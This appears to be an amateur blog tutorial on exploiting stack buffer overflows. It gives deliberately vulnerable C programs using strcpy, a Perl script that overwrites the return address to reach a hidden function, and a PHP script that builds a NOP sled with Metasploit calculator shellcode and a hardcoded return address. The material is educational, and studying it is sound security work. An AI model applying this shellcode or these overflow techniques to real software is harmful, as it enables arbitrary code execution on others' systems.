For free time that I don’t have

A Buffer overflow happens when the program doesn’t check the buffer size ( seams it’s an easy explanation ) My C programming is not well as PHP but I’ve written an example after a few searching , the vulnerable code has been shown below called bug.c :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

#include <stdio.h>
int bug(char *str){
char buffer[10];
strcpy(buffer,str);
return 0; }
int main (int argc,char **argv)
{ char * text = "Get away fucking lozer!";
int varible=0;
printf("Gonna into vuln.exe now\n");
bug(argv[1]);
if ( varible ==1){ Impossible();
}else{
printf("%s \n",text); }
printf("Exiting from vuln.exe");
return 0; }
int Impossible()
{ printf("Great ! You are success\n");
printf("But also you are a fucking lozer !\n"); }

• The Impossible() function never be executed because the ‘ IF ‘ has made a dam in program , at this article I’m going to cover some methods about exploitation to execute this function by buffer overflow hole existing in vulnerable program ! strcpy() function copies the string ( str ) given as input into buffer, The buffer size is defined before :

buffer[10];

What does happen when a large string like “aaa …. x 60 ” goes into program as input ? by 60 chars the program is exactly being overflowed and causes the return address ( EIP ) over written again after that event a new return address is 61616161 ( a is number 97 in ASCII and number 97 is 61 in hex )

Return address ’s changed to 61616161 which doesn’t exist and windows shows you an error and for following our goal out need some information explained farther as if at beginning have to find out how many bytes do we need ? ( 28 bytes but why ? ) should to point at Impossible function’s address , could simply find by debugger :

Dump of assembler code for function Impossible:
0x40132c > Impossible > push %ebp
0x40132d > Impossible+1> mov %esp,%ebp
0x40132f > Impossible+3 > sub $0x8,%esp
0x401332 > Impossible+6 > movl $0x40304b,(%esp,1)
0x401339 > Impossible+13> call 0x401880 <printf>
0x40133e > Impossible+18 > movl $0x403064,(%esp,1)
0x401345 > Impossible+25 > call 0x401880 <printf>
0x40134a > Impossible+30 > leave
0x40134b > Impossible+31> ret
0x40134c > Impossible+32 > nop
0x40134d > Impossible+33 > nop
0x40134e > Impossible+34 > nop
0x40134f > Impossible+35 > nop
End of assembler dump.

Requirements have not been met , the execution of 0040132c address is reason to continue which calls Impossible() function and 4 bytes EIP is used for return address so debugger is capable of finding amount of bytes which are needful . ( for more see the clip ) 28 bytes threw your work , the following exploit is written in Perl language :

1
2
3
4
5

#!/usr/bin/perl
$junk = "A" x 28;
$retaddress = "\x2C\x13\x40"; #"\x2C\x13\x40\x00"
$xpl = $junk.$retaddress;
system("bug.exe",$xpl);

• Impossible function will be called by the execution the exploit , it’s almost done here and the tutorial clip will complete my article is available HERE .

• The second code shows the what ever in the text file “input.txt” , take a look at the vulnerable program code :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

#include <stdio.h>
#include &lt;string.h&gt;
int Rfile(char*,char*,int);
int vuln(char *str){
char Lbuffer[300] = "File Data : ";
strcpy(Lbuffer+12,str);
printf("\n\n%s\n\n",Lbuffer);
return 0;
}
int main(){
char buff[1000];
char FNAME[] = "input.txt";
Rfile(buff,FNAME,1000);
vuln(buff);
return 0;
}int Rfile(char *buffer,char *Fname,int lim){
int a;
int b=0;
FILE *pFile = fopen(Fname,"r");
 
while( ( a = getc ( pFile ) )!= EOF ){
if ( b &amp;lt; lim ){
buffer[b++] = a;
}
}
buffer[b++] = 0;
fclose(pFile);
 
return 0;}

• By creating “intput.txt” in same directory and putting “what you want as text” into it and running the program , the results will be shown on black box , command prompt :

d:\Documents and Settings\Sc0rpion\Desktop>read

File Data : [ The text that is given to program by user ]

d:\Documents and Settings\Sc0rpion\Desktop>

• It seems everything is OK but wait a moment , if a large string goes into “input.txt” , some trouble ‘ll be made means the programs is overflowed by some bad string

aaaaaa ..... x 1000

Exploiting the written program for executing the calculator via included bug … hmmm interesting ? If you no longer wish to guess the buffer size solve it by referring to debugger ( see the second clip for more ) the metasploit official site helps you for creating shellcode .( I used calculator shellcode )

finally I wrote the exploit with my favorite programming language “PHP” , can be written simply in c++ and one thing else, you being a new programmer isn’t an excuse

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

<?php # shellcode 164 bytes
$shellcode ="\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98".
"\x1d\xdc\x62\x83\xeb\xfc\xe2\xf4\x64\xf5\x98\x62\x98\x1d\x57\x27".
"\xa4\x96\xa0\x67\xe0\x1c\x33\xe9\xd7\x05\x57\x3d\xb8\x1c\x37\x2b".
"\x13\x29\x57\x63\x76\x2c\x1c\xfb\x34\x99\x1c\x16\x9f\xdc\x16\x6f".
"\x99\xdf\x37\x96\xa3\x49\xf8\x66\xed\xf8\x57\x3d\xbc\x1c\x37\x04".
"\x13\x11\x97\xe9\xc7\x01\xdd\x89\x13\x01\x57\x63\x73\x94\x80\x46".
"\x9c\xde\xed\xa2\xfc\x96\x9c\x52\x1d\xdd\xa4\x6e\x13\x5d\xd0\xe9".
"\xe8\x01\x71\xe9\xf0\x15\x37\x6b\x13\x9d\x6c\x62\x98\x1d\x57\x0a".
"\xa4\x42\xed\x94\xf8\x4b\x55\x9a\x1b\xdd\xa7\x32\xf0\xed\x56\x66".
"\xc7\x75\x44\x9c\x12\x13\x8b\x9d\x7f\x7e\xb1\x06\xb6\x78\xa4\x07".
"\x98\x1d\xdc\x62";
# 140 bytes NOP
$nop= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 
# 4 bytes return address
$retadd = "\xA0\xFB\x22\x00"; //0022FBA0
$fp = fopen('input.txt','a+');
fputs($fp,$nop);
fputs($fp,$shellcode);
fputs($fp,$retadd);
fclose($fp);
print "Creating exploit ... done\n"; ?>

• A simple exercise for exploiting :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

#include <stdio.h>
#define max 78
int bug(char *string){
char buff[255];
strcpy(buff,string);
return 0;}
int target(){
printf("I can't count\n");
printf("bYe!\n");
}
enum { number0 , number1 } ;
int main (int argc, char *argv[])
{
bug(argv[1]);
char * text = "hello World!";
printf("I have somthing to say : %s\nI can count two wanna see?:%d%d\n",
text,
number0,
number1);
if ( max ==87) target();
return 0 ;
}

The linked tutorial clip to seconde part is loading here , Written by sc0rpion , all right reserved .